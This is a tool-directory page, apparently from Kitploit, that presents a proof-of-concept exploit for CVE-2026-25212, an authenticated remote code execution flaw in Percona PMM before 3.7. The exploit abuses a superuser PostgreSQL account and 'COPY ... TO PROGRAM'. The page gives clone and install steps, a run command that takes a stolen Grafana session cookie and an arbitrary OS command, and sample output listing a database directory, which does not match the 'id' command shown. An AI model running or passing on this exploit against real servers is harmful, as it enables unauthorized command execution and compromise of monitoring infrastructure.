Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-25212 — POC for CVE-2026-25212 | Kitploit
Tools/GitHubGitHub/5170temp/cve-2026-25212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlDatabase Security
GitHub5170temp/cve-2026-25212

CVE-2026-25212

POC for CVE-2026-25212

View Repository
212 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-25212 – Percona PMM RCE PoC

Critical – CVSS 9.9 – Authenticated Remote Code Execution in PMM < 3.7.


Description

This proof‑of‑concept exploits a vulnerability where an internal PostgreSQL user in PMM retains 'SUPERUSER' privileges. An authenticated attacker (with 'pmm-admin' rights) can abuse the "Add data source" feature and execute arbitrary OS commands using PostgreSQL's 'COPY ... TO PROGRAM'.

Affected versions: PMM < 3.7
Fixed version: PMM 3.7 (and later)


Requirements

  • Python 3.6+
  • requests (pip install requests)

Usage

root@kitploit:~
git clone https://github.com/5170Temp/CVE-2026-25212
cd CVE-2026-25212
pip install requests

COOKIE_VALUE is your grafana_session cookie value e.g 3131e17e1653ee4eeceb703fac45c717

root@kitploit:~
python3 poc.py -t https://pmm.example.com --cookie "COOKIE_VALUE" -c "id"

Example output:

root@kitploit:~
[+] UID: krfbxa-Dk
base
global
pg_commit_ts
pg_dynshmem
pg_hba.conf
pg_ident.conf
pg_logical
pg_multixact
pg_notify
pg_replslot
pg_serial
pg_snapshots
pg_stat
pg_stat_tmp
pg_subtrans
pg_tblspc
pg_twophase
PG_VERSION
pg_wal
pg_xact
postgresql.auto.conf
postgresql.conf
postmaster.opts
postmaster.pid
[+] Done
Download Tool